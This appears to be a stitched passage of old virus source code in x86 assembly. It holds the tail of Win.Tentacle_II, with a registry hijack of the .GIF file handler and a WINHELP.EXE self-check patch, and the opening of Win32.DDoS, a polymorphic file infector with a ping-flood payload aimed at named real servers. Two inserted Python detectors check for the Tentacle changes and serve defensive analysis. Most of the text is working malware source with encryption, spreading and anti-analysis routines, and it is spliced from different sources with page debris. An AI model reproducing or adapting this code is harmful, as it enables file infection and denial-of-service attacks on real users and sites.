        pop     ax                      ; clear stack
        JMP     exit_payload

RegQueryValue_success:
        cmp     byte ptr [bp.reg_buffer1], 0 ; has it returned an empty string?
        JE      try_shell_open_command

        push    ss                      ; ES=SS
        pop     es

        lea     di, [bp.reg_buffer1]    ; DI=offset return string
        cld                             ; clear direction flag
        xor     al, al                  ; AL=0
        mov     cx, 0FFFFh              ; CX=maximal word
        repne   scasb                   ; search for the end of the string
        dec     di                      ; DI points now to the terminating 0

        push    ds                      ; save DS
        push    cs                      ; DS=CS
        pop     ds

        mov     si, offset shell_open_command
        CALL    decrypt_path            ; decrypt & append it to the result
                                        ; of the RegQueryValue call

        pop     ds                      ; restore DS
        CALL    call_RegQueryValue
        or      ax, ax                  ; zero means success
        pop     ax                      ; restore AX (entry flag)
        JZ      RegQueryValue_success2

try_shell_open_command:
        mov     word ptr [bp.reg_buffer1], "G."
        mov     dword ptr [bp.reg_buffer1+2], "FI"

        push    ds                      ; save DS
        push    cs                      ; DS=CS
        pop     ds

        push    ss                      ; ES=SS
        pop     es

        mov     si, offset shell_open_command
        lea     di, [bp.reg_buffer1+4]  ; Load effective addr
        mov     cx, l_shell_open_command ; useless, the decrypt_path procedure
                                        ; gets the string length itself.
        CALL    decrypt_path
        pop     ds                      ; restore DS
        CALL    call_RegQueryValue
        or      ax, ax                  ; zero means success
        pop     ax
        JNZ     exit_payload

RegQueryValue_success2:
        ; reg_buffer2 now contains the commandline of the program that is
        ; run whenever the user doubleclicks on a .GIF file

        or      ax, ax                  ; check the entry flag in AX
        JZ      restore_gif_commandline

        push    ss                      ; ES=SS
        pop     es

        lea     di, [bp.reg_buffer2]    ; DI=pointer to commandline connected
                                        ; with .GIF files
        push    di                      ; save DI
        xor     al, al                  ; AL=0
        mov     cx, 0FFFFh              ; CX=maximal word
        repne   scasb                   ; search for the end of the string
        dec     di                      ; DI points now to the terminating 0
        mov     ax, di                  ; AX=end of string
        pop     di                      ; restore DI (start of string)
        sub     ax, di                  ; AX=length of string
        mov     cx, ax                  ; CX=length of string
        mov     al, "%"                 ; search the commandline for where
                                        ; the name of the gif will be on
                                        ; program start
        cld                             ; clear direction flag
        repne   scasb                   ; search for the % sign
        JNZ     exit_payload            ; if not found, exit payload
        cmp     byte ptr [di], "1"      ; is it the %1, like it has to be?
        JNE     exit_payload            ; if not, something is wrong
        cmp     byte ptr [di-2], '"'    ; is there the quotes sign?
        JNE     dont_skip_quotes
        dec     di                      ; if yes, skip it

dont_skip_quotes:
        dec     di                      ; go to the start of the first
                                        ; parameter in the commandline, the
                                        ; name of the .GIF file

        mov     dword ptr [di+9], "G.EL" ; create there the "C:\TENTACLE.GIF"
        mov     byte ptr [di], "C"      ; string
        mov     dword ptr [di+5], 7E00FD39h
        mov     dword ptr [di+0Dh], "FI"
        add     dword ptr [di+5], 0C5405715h
        mov     dword ptr [di+1], "ET\:"
        push    di                      ; save DI (offs of "C:\TENTACLE.GIF")
        CALL    call_RegSetValue        ; set the new value.

        ; from now on, every time the user doubleclicks on a gif file, it
        ; will only see C:\TENTACLE.GIF ;-)

        mov     ah, 3Ch                 ; create C:\TENTACLE.GIF file
        mov     cx, 7                   ; readonly,hidden,system attributes
        pop     dx                      ; DS:DX=ptr to filename to create
                                        ; ("C:\TENTACLE.GIF")
        int     21h
        JC      exit_payload

        mov     bx, ax                  ; handle to BX

        mov     word ptr [bp.reg_buffer2+2], "8F" ; create GIF marker in the
        mov     word ptr [bp.reg_buffer2+0], "IG" ; buffer ("GIF87a")
        mov     word ptr [bp.reg_buffer2+4], "a7"

        mov     ah, 40h                 ; write GIF marker
        mov     cx, 6                   ; size of gif marker
        lea     dx, [bp.reg_buffer2]    ; DS:DX=pointer to write buffer
        int     21h

        mov     ah, 40h                 ; write gif file body
        mov     cx, gif_body_size       ; size to write
        mov     dx, offset gif_body     ; DS:DX=pointer to write buffer
        push    ds                      ; save DS
        push    cs                      ; DS=CS
        pop     ds
        int     21h

        pop     ds                      ; restore DS

        mov     ah, 3Eh                 ; close file
        int     21h

        JMP     exit_payload            ; payload is done

restore_gif_commandline:
        push    ss                      ; ES=SS
        pop     es
        lea     di, [bp.reg_buffer2]    ; DI=pointer to commandline connected
                                        ; with .GIF files
        cld                             ; clear direction flag
        push    di                      ; save DI
        xor     al, al                  ; AL=0
        mov     cx, 0FFFFh              ; CX=maximal word
        repne   scasb                   ; search for the end of the string
        dec     di                      ; DI points now to the terminating 0
        mov     ax, di                  ; AX=end of string
        pop     di                      ; restore DI (start of string)
        sub     ax, di                  ; AX=length of string

        add     di, ax
        mov     cx, ax                  ; CX=length of string
        mov     al, " "                 ; search for the blank
        std                             ; set direction flag
        repne   scasb                   ; search for the end of the filename
        JNZ     exit_payload            ; if not found, exit
        add     di, 2                   ; go to 1st param (file to display)
        cmp     byte ptr [di], "C"      ; is there "C:\TENTACLE.GIF"
        JNE     exit_payload            ; if not, there's nothing to restore
        cmp     dword ptr [di+1], "ET\:" ; make really sure
        JNE     exit_payload
        mov     byte ptr [di], "%"      ; restore the correct cmdline "%1"
        mov     word ptr [di+1], "1"
        CALL    call_RegSetValue        ; set it.

exit_payload:
        add     sp, size payload_stack_frame ; free room on stack
        pop     bp                      ; restore BP (main stack frame ptr)
        pop     es                      ; restore ES
        RET

call_RegQueryValue:
;*      push    dword ptr 1             ; HKEY_CURRENT_USER
        db      66h, 68h, 1, 0, 0, 0    ; fixup - byte match

        push    ss                      ; push a far pointer to the name
        lea     ax, [bp.reg_buffer1]    ; of the subkey
        push    ax

        push    ss                      ; push a far pointer to the buffer
        lea     ax, [bp.reg_buffer2]    ; that will hold the return string
        push    ax

        mov     [bp.size_reg_buffer], 40h ; size of buffer for return string
        push    ss                      ; push a far pointer to the
        lea     ax, [bp.size_reg_buffer] ; dword that holds the size for the
        push    ax                      ; return string

        CALL    cs:RegQueryValue        ; far call to the RegQueryValue API

        RET

call_RegSetValue:
;*      push    dword ptr 1             ; HKEY_CURRENT_USER
        db      66h, 68h, 1, 0, 0, 0    ; fixup - byte match

        push    ss                      ; push a far pointer to the name
        lea     ax, [bp.reg_buffer1]    ; of the subkey
        push    ax

;*      push    dword ptr 1             ; REG_SZ (ASCIIZ string), REG_SZ = 1
        db      66h, 68h, 1, 0, 0, 0    ; fixup - byte match

        push    ss                      ; push a far pointer to the buffer
        lea     ax, [bp.reg_buffer2]    ; that holds the value string
        push    ax

;*      push    dword ptr 0             ; size of value data
        db      66h, 68h, 0, 0, 0, 0    ; fixup - byte match

        CALL    cs:RegSetValue          ; far call to the RegSetValue API

        RET
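From a defender's side, the registry change made by the payload above is easy to verify: the shell\open\command value for .GIF files normally passes the clicked file as "%1", and after the hijack its first parameter is the fixed path C:\TENTACLE.GIF. The following Python checker is an added example and not part of the listing; it classifies such a value and produces the restored command line the same way the restore_gif_commandline routine does (it writes "%1" back without re-adding quotes). The registry values in SAMPLE_VALUES are constructed for the example, and the function names are my own.

```python
import re

# Path the Win.Tentacle_II payload writes in place of the "%1" placeholder
# (taken from the listing above); the comparison is case-insensitive.
HIJACK_PATH = r"C:\TENTACLE.GIF"

# Constructed sample registry values (not real data) keyed by their path.
SAMPLE_VALUES = {
    r"HKCU\.GIF\shell\open\command": r"C:\WINDOWS\PBRUSH.EXE C:\TENTACLE.GIF",
    r"HKCU\giffile\shell\open\command": r'"C:\Program Files\Viewer\view.exe" "%1"',
    r"HKCU\.BMP\shell\open\command": r"C:\WINDOWS\PBRUSH.EXE C:\SOMETHING.BMP",
}


def analyse_gif_command(command):
    """Classify a shell\\open\\command value.

    Returns (status, restored_command) where status is
      "ok"       - the first parameter is still the "%1" placeholder,
      "hijacked" - the first parameter is the fixed TENTACLE path,
      "unknown"  - neither pattern is present (left for manual review).
    restored_command has "%1" put back (unchanged unless hijacked).
    """
    # Split on blanks while keeping double-quoted arguments together.
    tokens = re.findall(r'"[^"]*"|\S+', command)
    if len(tokens) < 2:
        return "unknown", command
    first_param = tokens[1].strip('"')
    if first_param == "%1":
        return "ok", command
    if first_param.upper() == HIJACK_PATH:
        # Like the restore routine in the listing, put "%1" back in place of
        # the fixed path; quoting of the original placeholder is not recovered.
        tokens[1] = "%1"
        return "hijacked", " ".join(tokens)
    return "unknown", command


def scan(values):
    """Return (registry_path, restored_value) for every hijacked entry."""
    findings = []
    for path, value in values.items():
        status, restored = analyse_gif_command(value)
        if status == "hijacked":
            findings.append((path, restored))
    return findings


if __name__ == "__main__":
    for path, restored in scan(SAMPLE_VALUES):
        print(f"{path}: hijacked, restore to: {restored}")
```

On a live system the values would come from the registry (for example via winreg) instead of the constructed dictionary; the classification logic is the same. An "unknown" result is deliberately not treated as clean, since a handler that passes something other than "%1" deserves a manual look.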

; ----- PATCH WINHELP -------------------------------------------------------

patch_winhelp:
        cmp     word ptr [bp.rw_buffer+1Ch], 2 ; number of segments
        JB      exit_patch_winhelp      ; it's not the WINHELP.EXE
                                        ; we know, don't patch it

        xor     eax, eax                ; EAX=0
        mov     ax, word ptr [bp.rw_buffer+22h] ; offset of segment table
                                        ; (relative to NE header)
        add     eax, [bp.new_header_offs] ; now relative to file start

;*      add     eax, 8                  ; go to 2nd segment descriptor
        db      66h, 83h, 0C0h, 08h     ; fixup - byte match

        push    eax                     ; CX:DX=EAX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; set filepointer to the
        int     21h                     ; descriptor.

        mov     ah, 3Fh                 ; read the aligned segment file offset
        mov     cx, 2                   ; read one word
        lea     dx, [bp.tmp_buffer]     ; DS:DX=pointer to read buffer
        int     21h

        xor     eax, eax                ; EAX=0
        mov     ax, word ptr [bp.tmp_buffer] ; EAX=aligned segment file offset
        mov     cl, byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
        shl     eax, cl                 ; EAX=segment file offset in bytes

;*      add     eax, 22h                ; go to offset 22h in 2nd segment
        db      66h, 83h, 0C0h, 22h     ; fixup - byte match

        push    eax                     ; CX:DX=EAX
        pop     dx
        pop     cx

        mov     ax, 4200h               ; set filepointer to offset 22h in
        int     21h                     ; the second segment
        JC      exit_patch_winhelp

        mov     ah, 3Fh                 ; read two bytes of program code
        mov     cx, 2                   ; size to read
        lea     dx, [bp.tmp_buffer]     ; DS:DX=pointer to read buffer
        int     21h
        JC      exit_patch_winhelp

        cmp     word ptr [bp.tmp_buffer], 1474h ; is it a JE $+16h ?
        JNE     exit_patch_winhelp      ; if not, it's not the WINHELP.EXE
                                        ; we know, don't patch it.

        mov     ax, 4201h               ; set filepointer back to the
                                        ; conditional jmp
        mov     cx, -1                  ; CX:DX=-2
        mov     dx, -2
        int     21h

        mov     byte ptr [bp.tmp_buffer], 0EBh ; an unconditional JMP SHORT

        mov     ah, 40h                 ; patch the file with the
                                        ; unconditional JMP
        mov     cx, 1                   ; write one byte
        lea     dx, [bp.tmp_buffer]     ; DS:DX=pointer to the write buffer
        int     21h

        ; WINHELP.EXE now has no self-check
        ; any more ;-)

exit_patch_winhelp:
        RET

        db      3 dup (0)               ; maybe the author wanted the
                                        ; relocation addresses on an address
                                        ; divisible by 4 ?

RegQueryValue   dd 0000FFFFh
RegSetValue     dd 0000FFFFh
org_entry       dd 0000FFFFh

virus_end:

; Most data of the virus is stored in a buffer on the stack. The following
; structure represents the lay-out of this stack frame:

stack_frame     struc
dta             db 2Bh dup (?)
tmp_buffer      db 10 dup (?)
bytes_to_copy   dd ?
full_filename   db 24 dup (?)
full_filespec   db 24 dup (?)
tmp_filename    db 16 dup (?)
source_handle   dw ?
dest_handle     dw ?
file_date       dw ?
file_time       dw ?
file_size       dd ?
new_header_offs dd ?
end_of_NE_hdr   dd ?
alignment_unit  dd ?
first_segm_offs dd ?
new_sect_descr  dw 4 dup (?)
rw_buffer       db 64 dup (?)
                dw ?
our_reloc_offs  dd ?
module_ordinal  dd ?
new_entry_CS    dw ?
new_entry_IP    dw ?
stack_frame     ends

; The data that is used in the EPO engine of the virus uses another stack
; frame that is represented in this structure:

EPO_stack_frame struc
entry_CS_offset dw ?
entry_CS_phys   dw ?
entry_CS_flags  dw ?
entry_CS_virt   dw ?
reloc_type      dw ?
reloc_offs      dw ?
reloc_what      dd ?
module_index    dw ?
API_ordinal     dw ?
entry_CS_relocs dd ?
relocs_number   dw ?
EPO_stack_frame ends

; Also the payload routine uses its own stack frame:

payload_stack_frame struc
reg_buffer1     db 40h dup (?)
reg_buffer2     db 40h dup (?)
size_reg_buffer dd ?
payload_stack_frame ends

first_gen_entry:
        push    ds                      ; save DS
        pusha                           ; save all registers

        push    ss                      ; DS=SS
        pop     ds

        sub     sp, size stack_frame    ; reserve room on stack
        mov     bp, sp                  ; setup stack frame

        mov     ah, 1Ah                 ; set DTA to DS:DX
        lea     dx, [bp.dta]            ; Load effective addr
        int     21h

        mov     si, offset exe_wildcard ; encrypt all the strings in the
        call    encrypt_wildcard        ; virus by a simple inc/dec
        mov     si, offset scr_wildcard ; algorithm
        call    encrypt_wildcard

        mov     si, offset C_win
        call    encrypt_path
        mov     si, offset C_windows
        call    encrypt_path
        mov     si, offset C_win31
        call    encrypt_path
        mov     si, offset C_win311
        call    encrypt_path
        mov     si, offset C_win95
        call    encrypt_path
        mov     si, offset shell_open_command
        call    encrypt_path

        mov     bx, 0FFFFh
        mov     cx, offset empty_string
        mov     dx, offset exe_wildcard
        CALL    infect_directory        ; infect all EXE files in current dir

        mov     ah, 9
        mov     dx, offset first_gen_message
        int     21h

        mov     ax, 4C00h
        int     21h

first_gen_message db "Win.Tentacle_II virus dropped", 0Dh, 0Ah, "$"

        end     first_gen_entry
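The patch_winhelp routine above locates the second segment of a NE executable through the header fields at 16h/1Ch/22h/32h and the 8-byte segment table, then turns a JE (74 14) at offset 22h of that segment into JMP SHORT (EB 14). An analyst checking a WINHELP.EXE for that modification can walk the same structures. The following Python is an added example, not part of the listing: it parses the NE segment table and reports whether the self-check jump is intact, patched, or not the expected code at all. One difference from the listing: a zero alignment shift count is treated as the NE default of 9 (512-byte sectors) rather than shifted by zero. The function names are mine, and build_sample_image constructs a minimal NE layout for the test; it is not a real WINHELP.EXE.

```python
import struct

# NE header field offsets, relative to the NE header, as used in the listing.
NE_SEGMENT_COUNT   = 0x1C   # word: number of entries in the segment table
NE_SEGTABLE_OFFSET = 0x22   # word: segment table offset, relative to NE header
NE_ALIGN_SHIFT     = 0x32   # byte: file alignment shift count (0 means 9)
SEGMENT_ENTRY_SIZE = 8      # sector offset, length, flags, min alloc (4 words)

# Bytes at offset 22h of the second segment: JE $+16h when intact,
# JMP SHORT $+16h after the patch described in the listing.
CHECK_OFFSET   = 0x22
INTACT_OPCODE  = b"\x74\x14"
PATCHED_OPCODE = b"\xEB\x14"


def ne_segments(image):
    """Return [(file_offset, length), ...] for every segment of an NE image.

    Raises ValueError when the image is not an MZ executable with a NE header.
    """
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    ne_off = struct.unpack_from("<I", image, 0x3C)[0]
    if image[ne_off:ne_off + 2] != b"NE":
        raise ValueError("no NE header at e_lfanew")
    count = struct.unpack_from("<H", image, ne_off + NE_SEGMENT_COUNT)[0]
    table = ne_off + struct.unpack_from("<H", image, ne_off + NE_SEGTABLE_OFFSET)[0]
    shift = image[ne_off + NE_ALIGN_SHIFT] or 9   # NE default sector size is 512
    segments = []
    for i in range(count):
        sector, length = struct.unpack_from("<HH", image, table + i * SEGMENT_ENTRY_SIZE)
        segments.append((sector << shift, length))
    return segments


def winhelp_selfcheck_state(image):
    """'intact', 'patched' or 'unknown' for the self-check jump the listing targets."""
    segments = ne_segments(image)
    if len(segments) < 2:          # same early-out as the listing (number of segments < 2)
        return "unknown"
    pos = segments[1][0] + CHECK_OFFSET
    opcode = image[pos:pos + 2]
    if opcode == INTACT_OPCODE:
        return "intact"
    if opcode == PATCHED_OPCODE:
        return "patched"
    return "unknown"


def build_sample_image(patched=False):
    """Constructed minimal NE layout for testing (not a real WINHELP.EXE):
    MZ header, NE header at 0x40, segment table at NE+0x40, alignment shift 4,
    two segments at file offsets 0x100 and 0x200."""
    img = bytearray(0x300)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)           # e_lfanew -> NE header
    ne = 0x40
    img[ne:ne + 2] = b"NE"
    struct.pack_into("<H", img, ne + NE_SEGMENT_COUNT, 2)
    struct.pack_into("<H", img, ne + NE_SEGTABLE_OFFSET, 0x40)
    img[ne + NE_ALIGN_SHIFT] = 4                      # 16-byte sectors
    table = ne + 0x40
    struct.pack_into("<HHHH", img, table, 0x10, 0x80, 0, 0)       # segment 1 at 0x100
    struct.pack_into("<HHHH", img, table + 8, 0x20, 0x80, 0, 0)   # segment 2 at 0x200
    code = PATCHED_OPCODE if patched else INTACT_OPCODE
    img[0x200 + CHECK_OFFSET:0x200 + CHECK_OFFSET + 2] = code
    return bytes(img)


if __name__ == "__main__":
    for flag in (False, True):
        print("constructed image, patched=%s: %s" % (flag, winhelp_selfcheck_state(build_sample_image(flag))))
```

Run against a real file, the image would be the bytes of WINHELP.EXE read from disk; a "patched" result means the conditional self-check branch has been replaced, which is a strong indicator that the file was processed by this virus and should be restored from a known-good copy.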

;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
; This is the first Windows Virus I've written so far, and some parts are from
; Win32.Aztec by Billy Belcebu, because at the time I wrote this thing, not everything
; was clear in my mind, as it is now, hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to keep track that they don't look completely useless.
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but I use several methods to put the values inside
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
; I was just able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
; It tries to get the 4 following API's:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Winsck32.dll <- Payload : Ping-flood a server
;
; What does this Virus do :
;
; - 1.st Generation infects just the current directory ( easier to infect just some files *eg* )
; - Get's API's with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
; - Infects the current, the windows and the system directory and parses some
;   random directory's on drive C:
; - Follows LNK - Files ( does not work with NT / 2k )
; - Removes and restores File-Attributes
; - Parses Drive C:, enters a folder with a chance of 1 to 3
; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there )
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorph decryptor which will be used for all files infected in one run
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is a icmp flood on one of these servers :
;
;   Sunday    = www.bundesnachrichtendienst.de
;   Monday    = French Secret Service ( dgse.citeweb.net )
;   Tuesday   = www.avp.com ( AV )
;   Wednesday = www.lockdown2000.com
;   Thursday  = www.f-secure.com
;   Friday    = www.norton.com
;   Saturday  = www.zonelabs.com
;
; *# Please note that I choose these servers because I think they can     #*
; *# handle such an attack, if any idiot would release this into the wild. #*
;
; To make this code working use TASM 5.0 and pewrsec.
;
; Thanks and greetz fly to these people:
;
; Billy Belcebu - Your Win32 VWG is just great ..
;                 ( you'll find some of your code [Win32.Aztec] here ;)
; Evul          - Thanks for hosting my site at coderz.net
; Ciatrix       - Hope you carry on your good work with VDAT !
; SnakeMan      - Hope you get more entrys *g* --> http://altavirus.cjb.net
; PhilippP      - Thanks for the thrilling test in 2k .. ;)
; BumbleBee     - Still thinking of Sex ?
; diediedie     - Thnx for demotivating me... :)
; asmodeus      - nice beginner lesson in poly ;)
; darkman       - just believe me: the question was stupid ;)
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************

.586p
.model flat
jumps                                   ; Jumps get calculated
                                        ; ( I know not good for optimizing.. )
.radix 16                               ; All numbers are Hexadecimal
                                        ; I once searched for a forgotten 'h'
                                        ; 2 weeks until I found this bug.. :P

; some API's
extrn ExitProcess:PROC                  ; fake host for 1. Generation
extrn MessageBoxA:PROC                  ; For testing purposes ( no longer needed )
                                        ; but I needed it for error-detection *g*
                                        ; 'cause I am too stupid to work with softice.. :(

.data                                   ; fake data for TASM
db ?                                    ; otherwise TASM would not compile this
                                        ; we store all our data in the code
                                        ; section, that's why we need to use
                                        ; pewrsec after compiling, to set the
                                        ; code section flags to write !

; some constants I don't want to calculate on my own *g*
VirusSize       equ (offset VirusEnd - offset Virus)
CryptSize       equ (offset VirusEnd - offset CryptStart)
NoCrypt         equ (offset CryptStart - offset Virus)
FirstLSize      equ (offset VirusEnd - offset FirstLayerStart)
Buffersize      equ (offset EndBufferData - offset VirusEnd)

FILETIME        STRUC
FT_dwLowDateTime  dd ?
FT_dwHighDateTime dd ?
FILETIME        ENDS

.code

; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************

Virus:                                  ; Here we go

        call    PDecrypt                ; call the poly decryption routine
                                        ; which is located at the end of virus
                                        ; just a simple 'ret' in the first generation

FirstLayerStart:                        ; here starts the first layer
                                        ; everything will be crypted from here on

        call    Delta                   ; let's get the delta - offset

Delta:
        mov     ebp, offset Delta       ; I want to do this a bit different
        neg     ebp                     ; than usual, who knows, maybe this
        pop     eax                     ; fools some bad heuristics
        add     ebp, eax

        or      ebp, ebp                ; we don't need to decrypt the 1.
        jz      CryptStart              ; Generation

        ; save esp
        mov     dword ptr [ebp+XESP], esp

        mov     ecx, (CryptSize / 2)    ; the length of crypted part in words
        mov     dx, word ptr [ebp+Key]
        lea     esp, [ebp+CryptStart]   ; set esp to the start of the decrypted part

DeCryptLoop:                            ; let's decrypt the virus
        pop     ax                      ; we pop the body word by word
        inc     dx                      ; this method fucks with debuggers, who
        xchg    dl, dh                  ; trace with int 1h ( destroys stack )
        xchg    al, ah
        xor     ax, dx
        not     ax
        push    ax
        add     esp, 2h
        loop    DeCryptLoop

        ; restore esp
        mov     esp, dword ptr [ebp+XESP]

        jmp     CryptStart              ; start virus

Key     dw      0h                      ; our key
XESP    dd      0h                      ; we save the esp here

        db      4 dup (90h)             ; some nop's so we will not jump into an instruction
                                        ; ( happened sometimes during testing :( )
                                        ; because of the prefetch queue buffer ( or whatever this is
                                        ; spelled .. )
CryptStart:

        ; we save these two values ( EIP & Imagebase )
        ; to be able to return to the original host..

        mov     eax, dword ptr [ebp+OldEIP]
        mov     dword ptr [ebp+retEIP], eax
        mov     eax, dword ptr [ebp+OldBase]
        mov     dword ptr [ebp+retBas], eax

        mov     eax, dword ptr fs:[0]   ; save the original SEH
        mov     dword ptr [ebp+SEH_Save], eax

        mov     esi, [esp]              ; let's get the return address of the CreateProcess API
        xor     si, si                  ; round it to a full page

        push    dword ptr [ebp+Error_ExecuteHost]
        mov     fs:[0], esp             ; set new SEH

        call    GetKernel               ; try to get it
        jnc     GetApis                 ; If got it we try to retrieve the API's

                                        ; Otherwise, we try to check for
                                        ; the kernel at some fixed addresses
                                        ; But the way above should work most
                                        ; of the times.. :)

        mov     esi, 0BFF70000h         ; try the Win95 Kernel Addy
        call    GetKernel
        jnc     GetApis

        mov     esi, 077F00000h         ; try the WinNT Kernel Addy
        call    GetKernel
        jnc     GetApis

        mov     esi, 077e00000h         ; try the Win2k Kernel Addy
        call    GetKernel
        jnc     GetApis

                                        ; if we still did not find the
        jmp     Error_ExecuteHost       ; kernel we stop the virus
                                        ; and execute the goat

; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************

; These are the 2 API's we search in the Kernel
; we need them to get all the other API's
; I prefer LoadLibraryA to GetModuleHandle,
; because it is no longer necessary, that the
; file we infect loads the dll files we need,
; we load them on our own,... ;)
; This means, we can use almost any API we want to *eg*
; LoadLibraryA also returns the Module-Handle, but
; if it is not loaded it loads it ... bla.. ;P

LL      db      'LoadLibraryA', 0h      ; we need these API's for searching..
GPA     db      'GetProcAddress', 0h

GetApis:                                ; Offset of the Kernel32.dll PE-Header is in EAX

        mov     [ebp+KernelAddy], eax   ; Save it
        mov     [ebp+MZAddy], ebx

        lea     edx, [ebp+LL]           ; Points to name of the LoadLibraryA - API
        mov     ecx, 0Ch                ; Length of Name
        call    SearchAPI1              ; search it..
        mov     [ebp+XLoadLibraryA], eax ; Save the Addy

        xchg    eax, ecx                ; If we didn't get this API or the other one, we quit !
        jecxz   ExecuteHost             ; thnx to Billy ;)

        lea     edx, [ebp+GPA]          ; Points to name of the GetProcAddress - API
        mov     ecx, 0Eh                ; Length of Name
        call    SearchAPI1
        mov     [ebp+XGetProcAddress], eax ; Save the Addy

        xchg    eax, ecx                ; check if we failed
        jecxz   ExecuteHost             ; ( thnx again, nice way of optimization *g* )

                                        ; Now we have our 2 necessary API's
        jmp     GetAPI2                 ; and are able to get the others

                                        ; Yes I know this jmp is not very optimizing.. ;)
                                        ; But storing the data here helps me understanding
                                        ; my code *bg*

                                        ; this dll is delivered with every version
KERNEL32 db     'Kernel32', 0           ; of windows, so we will get it always ( ..most likely *g* )
                                        ; the virus relies on it

IMAGEHLP db     'Imagehlp', 0           ; this dll is not necessarily needed, but dll's will
                                        ; only get infected, if we are able to use the CheckSumMappedFile
                                        ; Function from this dll to create a checksum
                                        ; it is delivered with win9x, NT and several compilers.

ADVAPI  db      'advapi32', 0           ; this dll is necessary to retrieve the startmenue folder
                                        ; from registry, so we are able to follow the shortcuts there

WSOCK   db      'wsock32.dll', 0        ; we need this one here to perform a ping
                                        ; ( not needed for the virus, but the payload )

GetAPI2:                                ; We get them, by grabbing the handles of
                                        ; different DLL's first and use GetProcAddress
                                        ; to locate the API's itself

                                        ; Let's get the Handles by calling
                                        ; the LoadLibrary API.. :)
                                        ; if we fail to get the
                                        ; Kernel32, we execute the
                                        ; original host

        lea     eax, [ebp+KERNEL32]
        push    eax
        call    dword ptr [ebp+XLoadLibraryA]
        mov     [ebp+K32Handle], eax
        test    eax, eax
        jz      ExecuteHost

        lea     eax, [ebp+IMAGEHLP]
        push    eax
        call    dword ptr [ebp+XLoadLibraryA]
        mov     [ebp+IHLHandle], eax

        lea     eax, [ebp+ADVAPI]
        push    eax
        call    dword ptr [ebp+XLoadLibraryA]
        mov     [ebp+ADVHandle], eax

        lea     eax, [ebp+WSOCK]
        push    eax
        call    dword ptr [ebp+XLoadLibraryA]
        mov     [ebp+W32Handle], eax

        lea     esi, [ebp+Kernel32Names]
        lea     edi, [ebp+XFindFirstFileA]
        mov     ebx, [ebp+K32Handle]
        push    NumberOfKernel32APIS
        pop     ecx
        call    GetAPI3

        lea     esi, [ebp+ImageHLPNames]
        lea     edi, [ebp+XCheckSumMappedFile]
        mov     ebx, [ebp+IHLHandle]
        xor     ecx, ecx
        inc     ecx
        call    GetAPI3

        lea     esi, [ebp+ADVAPI32Names]
        lea     edi, [ebp+XRegOpenKeyExA]
        mov     ebx, [ebp+ADVHandle]
        push    3d
        pop     ecx
        call    GetAPI3

        lea     esi, [ebp+WSOCK32Names]
        lea     edi, [ebp+Xsocket]
        mov     ebx, [ebp+W32Handle]
        push    3d
        pop     ecx
        call    GetAPI3

; ************************************************* **************************; ------------------[ Outbreak ! Here we start infe cting ]-------------------; ************************************************* **************************

; Now we got everything we need to; start infecting some files *eg*; First of all we retrieve the; foldernames of the current folder,; the system folder, and the windows folder

Page 234: EZine - Coderz #1

; these are the folders we start to infect
    lea edi, [ebp+curdir]
    push edi
    push 7Fh
    call dword ptr [ebp+XGetCurrentDirectoryA]

    call genPoly                    ; before we infect anything, we
                                    ; create a poly decryptor used for
                                    ; all files we infect = slow poly !

    mov [ebp+InfCounter], 10d       ; Number of files we want to infect !
    call InfectCurDir               ; first of all we infect the current directory

    or ebp, ebp                     ; if this is the first generation, we infect just
    jz ExecuteHost                  ; the first directory ( makes it easier to infect
                                    ; just some files .. *g*
                                    ; we also don't start the payload !

    push 7Fh                        ; buffer - size
                                    ; 7fh = 127d = max length of Directory name

    lea edi, [ebp+windir]           ; Pointer to the offset where we save the directory
    push edi
    call dword ptr [ebp+XGetWindowsDirectoryA]

    lea edi, [ebp+windir]           ; then we infect the windows directory
    push edi
    call dword ptr [ebp+XSetCurrentDirectoryA]
    mov [ebp+InfCounter], 10d
    call InfectCurDir

; we save both directories in the same buffer
    push 7Fh                        ; so we save 127 Bytes of the Buffersize
    lea edi, [ebp+windir]
    push edi
    call dword ptr [ebp+XGetSystemDirectoryA]

    lea edi, [ebp+windir]           ; and the system directory ..
    push edi
    call dword ptr [ebp+XSetCurrentDirectoryA]
    mov [ebp+InfCounter], 10d
    call InfectCurDir

; if everything went fine, we have
; infected now up to 30 files !
; Is this enough ?
; ( please note that this is a rhetorical question *g* )
; We want more !

; ***************************************************************************
; -----------------------[ Parse Directories ]-------------------------------
; ***************************************************************************

InitParsing:

    mov [ebp+InfCounter], 30d       ; let's parse some directories for
                                    ; 30 more files !

    lea edi, [ebp+RootDir]
    call dword ptr [ebp+XSetCurrentDirectoryA]
    call ParseFolder

; if we are not able to access the registry we
; infect another 20 Files in the System-Directory

    cmp dword ptr [ebp+XRegOpenKeyExA], 0h
    je InfectWinDirAgain
    call GetStartMenue              ; last but not least, we try to parse the
                                    ; start-menu folder ( follow the LNK's )
                                    ; to get 20 more files
